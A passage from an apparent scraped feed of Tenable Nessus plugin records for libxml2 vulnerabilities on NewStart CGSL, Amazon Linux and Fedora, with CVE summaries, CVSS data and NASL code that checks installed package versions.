'libxml2-2.9.1-6.el7.4',\n 'libxml2-debuginfo-2.9.1-6.el7.4',\n 'libxml2-devel-2.9.1-6.el7.4',\n 'libxml2-python-2.9.1-6.el7.4',\n 'libxml2-static-2.9.1-6.el7.4'\n ]\n};\npkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:'ZTE ' + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libxml2');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:13:42", "description": "The remote NewStart CGSL host, running version CORE 5.04 / MAIN 5.04, has libxml2 packages 
installed that are affected by multiple vulnerabilities:\n\n - Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function. (CVE-2016-5131)\n\n - Use after free in libxml2 before 2.9.5, as used in Google Chrome prior to 63.0.3239.84 and other products, allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2017-15412)\n\n - A NULL pointer dereference vulnerability exists in the xpath.c:xmlXPathCompOpEval() function of libxml2 through 2.9.8 when parsing an invalid XPath expression in the XPATH_OP_AND or XPATH_OP_OR case.\n Applications processing untrusted XSL format inputs with the use of the libxml2 library may be vulnerable to a denial of service attack due to a crash of the application. (CVE-2018-14404)\n\n - libxml2 2.9.8, if --with-lzma is used, allows remote attackers to cause a denial of service (infinite loop) via a crafted XML file that triggers LZMA_MEMLIMIT_ERROR, as demonstrated by xmllint, a different vulnerability than CVE-2015-8035 and CVE-2018-9251. (CVE-2018-14567)\n\n - The xz_head function in xzlib.c in libxml2 before 2.9.6 allows remote attackers to cause a denial of service (memory consumption) via a crafted LZMA file, because the decoder functionality does not restrict memory usage to what is required for a legitimate file. 
(CVE-2017-18258)\n\n - The xz_decomp function in xzlib.c in libxml2 2.9.1 does not properly detect compression errors, which allows context-dependent attackers to cause a denial of service (process hang) via crafted XML data.\n (CVE-2015-8035)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "NewStart CGSL CORE 5.04 / MAIN 5.04 : libxml2 Multiple Vulnerabilities (NS-SA-2020-0060)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8035", "CVE-2016-5131", "CVE-2017-15412", "CVE-2017-18258", "CVE-2018-14404", "CVE-2018-14567", "CVE-2018-9251"], "modified": "2020-12-10T00:00:00", "cpe": [], "id": "NEWSTART_CGSL_NS-SA-2020-0060_LIBXML2.NASL", "href": "https://www.tenable.com/plugins/nessus/143906", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2020-0060. 
The text\n# itself is copyright (C) ZTE, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143906);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/10\");\n\n script_cve_id(\n \"CVE-2015-8035\",\n \"CVE-2016-5131\",\n \"CVE-2017-15412\",\n \"CVE-2017-18258\",\n \"CVE-2018-14404\",\n \"CVE-2018-14567\"\n );\n script_bugtraq_id(\n 77390,\n 92053,\n 102098,\n 105198\n );\n\n script_name(english:\"NewStart CGSL CORE 5.04 / MAIN 5.04 : libxml2 Multiple Vulnerabilities (NS-SA-2020-0060)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote machine is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version CORE 5.04 / MAIN 5.04, has libxml2 packages installed that are affected\nby multiple vulnerabilities:\n\n - Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82,\n allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors\n related to the XPointer range-to function. (CVE-2016-5131)\n\n - Use after free in libxml2 before 2.9.5, as used in Google Chrome prior to 63.0.3239.84 and other products,\n allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2017-15412)\n\n - A NULL pointer dereference vulnerability exists in the xpath.c:xmlXPathCompOpEval() function of libxml2\n through 2.9.8 when parsing an invalid XPath expression in the XPATH_OP_AND or XPATH_OP_OR case.\n Applications processing untrusted XSL format inputs with the use of the libxml2 library may be vulnerable\n to a denial of service attack due to a crash of the application. 
(CVE-2018-14404)\n\n - libxml2 2.9.8, if --with-lzma is used, allows remote attackers to cause a denial of service (infinite\n loop) via a crafted XML file that triggers LZMA_MEMLIMIT_ERROR, as demonstrated by xmllint, a different\n vulnerability than CVE-2015-8035 and CVE-2018-9251. (CVE-2018-14567)\n\n - The xz_head function in xzlib.c in libxml2 before 2.9.6 allows remote attackers to cause a denial of\n service (memory consumption) via a crafted LZMA file, because the decoder functionality does not restrict\n memory usage to what is required for a legitimate file. (CVE-2017-18258)\n\n - The xz_decomp function in xzlib.c in libxml2 2.9.1 does not properly detect compression errors, which\n allows context-dependent attackers to cause a denial of service (process hang) via crafted XML data.\n (CVE-2015-8035)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2020-0060\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL libxml2 packages. Note that updated packages may not be available yet. 
Please contact ZTE\nfor more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-15412\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/ZTE-CGSL/release');\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, 'NewStart Carrier Grade Server Linux');\n\nif (release !~ \"CGSL CORE 5.04\" &&\n release !~ \"CGSL MAIN 5.04\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL CORE 5.04 / NewStart CGSL MAIN 5.04');\n\nif (!get_kb_item('Host/ZTE-CGSL/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'NewStart Carrier Grade Server Linux', cpu);\n\nflag = 0;\n\npkgs = {\n 'CGSL CORE 5.04': [\n 'libxml2-2.9.1-6.el7.4',\n 'libxml2-debuginfo-2.9.1-6.el7.4',\n 'libxml2-devel-2.9.1-6.el7.4',\n 'libxml2-python-2.9.1-6.el7.4',\n 'libxml2-static-2.9.1-6.el7.4'\n ],\n 'CGSL MAIN 5.04': [\n 'libxml2-2.9.1-6.el7.4',\n 'libxml2-debuginfo-2.9.1-6.el7.4',\n 'libxml2-devel-2.9.1-6.el7.4',\n 'libxml2-python-2.9.1-6.el7.4',\n 'libxml2-static-2.9.1-6.el7.4'\n ]\n};\npkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:'ZTE ' + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libxml2');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:09:28", "description": "A NULL pointer dereference vulnerability exists in the xpath.c:xmlXPathCompOpEval() function 
of libxml2 through 2.9.8 when parsing an invalid XPath expression in the XPATH_OP_AND or XPATH_OP_OR case. Applications processing untrusted XSL format inputs with the use of the libxml2 library may be vulnerable to a denial of service attack due to a crash of the application. A NULL pointer dereference vulnerability exists in the xpath.c:xmlXPathCompOpEval() function of libxml2 when parsing invalid XPath expression. Applications processing untrusted XSL format inputs with the use of libxml2 library may be vulnerable to denial of service attack due to crash of the application. (CVE-2018-14404)\n\nUse after free in libxml2 before 2.9.5, as used in Google Chrome prior to 63.0.3239.84 and other products, allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. A use-after-free flaw was found in the libxml2 library. An attacker could use this flaw to cause an application linked against libxml2 to crash when parsing a specially crafted XML file. (CVE-2017-15412)\n\nThe xz_decomp function in xzlib.c in libxml2 2.9.1 does not properly detect compression errors, which allows context-dependent attackers to cause a denial of service (process hang) via crafted XML data. A denial of service flaw was found in libxml2. A remote attacker could provide a specially crafted XML or HTML file that, when processed by an application using libxml2, would cause that application to crash.\n(CVE-2015-8035)\n\nlibxml2 2.9.8, if --with-lzma is used, allows remote attackers to cause a denial of service (infinite loop) via a crafted XML file that triggers LZMA_MEMLIMIT_ERROR, as demonstrated by xmllint, a different vulnerability than CVE-2015-8035 and CVE-2018-9251 . 
(CVE-2018-14567)\n\nThe xz_head function in xzlib.c in libxml2 before 2.9.6 allows remote attackers to cause a denial of service (memory consumption) via a crafted LZMA file, because the decoder functionality does not restrict memory usage to what is required for a legitimate file.\n(CVE-2017-18258)\n\nUse-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function. (CVE-2016-5131)", "cvss3": {}, "published": "2020-08-13T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : libxml2 (ALAS-2020-1415)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8035", "CVE-2016-5131", "CVE-2017-15412", "CVE-2017-18258", "CVE-2018-14404", "CVE-2018-14567", "CVE-2018-9251"], "modified": "2022-01-26T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:libxml2", "p-cpe:/a:amazon:linux:libxml2-debuginfo", "p-cpe:/a:amazon:linux:libxml2-devel", "p-cpe:/a:amazon:linux:libxml2-python26", "p-cpe:/a:amazon:linux:libxml2-python27", "p-cpe:/a:amazon:linux:libxml2-static", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2020-1415.NASL", "href": "https://www.tenable.com/plugins/nessus/139549", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2020-1415.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139549);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/26\");\n\n script_cve_id(\n \"CVE-2015-8035\",\n \"CVE-2016-5131\",\n \"CVE-2017-15412\",\n \"CVE-2017-18258\",\n \"CVE-2018-14404\",\n \"CVE-2018-14567\"\n );\n script_xref(name:\"ALAS\", value:\"2020-1415\");\n\n script_name(english:\"Amazon Linux AMI : libxml2 (ALAS-2020-1415)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote 
Amazon Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"A NULL pointer dereference vulnerability exists in the\nxpath.c:xmlXPathCompOpEval() function of libxml2 through 2.9.8 when\nparsing an invalid XPath expression in the XPATH_OP_AND or XPATH_OP_OR\ncase. Applications processing untrusted XSL format inputs with the use\nof the libxml2 library may be vulnerable to a denial of service attack\ndue to a crash of the application. A NULL pointer dereference\nvulnerability exists in the xpath.c:xmlXPathCompOpEval() function of\nlibxml2 when parsing invalid XPath expression. Applications processing\nuntrusted XSL format inputs with the use of libxml2 library may be\nvulnerable to denial of service attack due to crash of the\napplication. (CVE-2018-14404)\n\nUse after free in libxml2 before 2.9.5, as used in Google Chrome prior\nto 63.0.3239.84 and other products, allowed a remote attacker to\npotentially exploit heap corruption via a crafted HTML page. A\nuse-after-free flaw was found in the libxml2 library. An attacker\ncould use this flaw to cause an application linked against libxml2 to\ncrash when parsing a specially crafted XML file. (CVE-2017-15412)\n\nThe xz_decomp function in xzlib.c in libxml2 2.9.1 does not properly\ndetect compression errors, which allows context-dependent attackers to\ncause a denial of service (process hang) via crafted XML data. A\ndenial of service flaw was found in libxml2. A remote attacker could\nprovide a specially crafted XML or HTML file that, when processed by\nan application using libxml2, would cause that application to crash.\n(CVE-2015-8035)\n\nlibxml2 2.9.8, if --with-lzma is used, allows remote attackers to\ncause a denial of service (infinite loop) via a crafted XML file that\ntriggers LZMA_MEMLIMIT_ERROR, as demonstrated by xmllint, a different\nvulnerability than CVE-2015-8035 and CVE-2018-9251 . 
(CVE-2018-14567)\n\nThe xz_head function in xzlib.c in libxml2 before 2.9.6 allows remote\nattackers to cause a denial of service (memory consumption) via a\ncrafted LZMA file, because the decoder functionality does not restrict\nmemory usage to what is required for a legitimate file.\n(CVE-2017-18258)\n\nUse-after-free vulnerability in libxml2 through 2.9.4, as used in\nGoogle Chrome before 52.0.2743.82, allows remote attackers to cause a\ndenial of service or possibly have unspecified other impact via\nvectors related to the XPointer range-to function. (CVE-2016-5131)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2020-1415.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update libxml2' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-15412\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/08/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2-python26\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:amazon:linux:libxml2-python27\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"libxml2-2.9.1-6.4.40.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"libxml2-debuginfo-2.9.1-6.4.40.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"libxml2-devel-2.9.1-6.4.40.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"libxml2-python26-2.9.1-6.4.40.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"libxml2-python27-2.9.1-6.4.40.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"libxml2-static-2.9.1-6.4.40.amzn1\")) flag++;\n\nif (flag)\n{\n if 
(report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2 / libxml2-debuginfo / libxml2-devel / libxml2-python26 / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:12:08", "description": "Update to latest upstream release, includes several security related fixes.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-04-20T00:00:00", "type": "nessus", "title": "Fedora 25 : libxml2 (2017-a3a47973eb)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1762", "CVE-2016-1833", "CVE-2016-1834", "CVE-2016-1835", "CVE-2016-1836", "CVE-2016-1837", "CVE-2016-1838", "CVE-2016-1839", "CVE-2016-1840", "CVE-2016-4447", "CVE-2016-4448", "CVE-2016-4449", "CVE-2016-4658", "CVE-2016-5131", "CVE-2016-9318", "CVE-2017-5969"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libxml2", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-A3A47973EB.NASL", "href": "https://www.tenable.com/plugins/nessus/99491", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-a3a47973eb.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99491);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-1762\", \"CVE-2016-1833\", \"CVE-2016-1834\", \"CVE-2016-1835\", \"CVE-2016-1836\", \"CVE-2016-1837\", 
\"CVE-2016-1838\", \"CVE-2016-1839\", \"CVE-2016-1840\", \"CVE-2016-4447\", \"CVE-2016-4448\", \"CVE-2016-4449\", \"CVE-2016-4658\", \"CVE-2016-5131\", \"CVE-2016-9318\", \"CVE-2017-5969\");\n script_xref(name:\"FEDORA\", value:\"2017-a3a47973eb\");\n\n script_name(english:\"Fedora 25 : libxml2 (2017-a3a47973eb)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to latest upstream release, includes several security related\nfixes.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-a3a47973eb\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libxml2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/24\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2017/04/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"libxml2-2.9.4-2.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:11:00", "description": "Update to latest upstream release, includes several security related fixes.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-04-20T00:00:00", "type": "nessus", "title": "Fedora 24 : libxml2 (2017-be8574d593)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1762", "CVE-2016-1833", "CVE-2016-1834", "CVE-2016-1835", "CVE-2016-1836", "CVE-2016-1837", "CVE-2016-1838", "CVE-2016-1839", "CVE-2016-1840", "CVE-2016-4447", "CVE-2016-4448", "CVE-2016-4449", "CVE-2016-4658", "CVE-2016-5131", "CVE-2016-9318", "CVE-2017-5969"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libxml2", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-BE8574D593.NASL", "href": "https://www.tenable.com/plugins/nessus/99492", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted 
from Fedora Security Advisory FEDORA-2017-be8574d593.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99492);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-1762\", \"CVE-2016-1833\", \"CVE-2016-1834\", \"CVE-2016-1835\", \"CVE-2016-1836\", \"CVE-2016-1837\", \"CVE-2016-1838\", \"CVE-2016-1839\", \"CVE-2016-1840\", \"CVE-2016-4447\", \"CVE-2016-4448\", \"CVE-2016-4449\", \"CVE-2016-4658\", \"CVE-2016-5131\", \"CVE-2016-9318\", \"CVE-2017-5969\");\n script_xref(name:\"FEDORA\", value:\"2017-be8574d593\");\n\n script_name(english:\"Fedora 24 : libxml2 (2017-be8574d593)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to latest upstream release, includes several security related\nfixes.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-be8574d593\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libxml2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 
value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
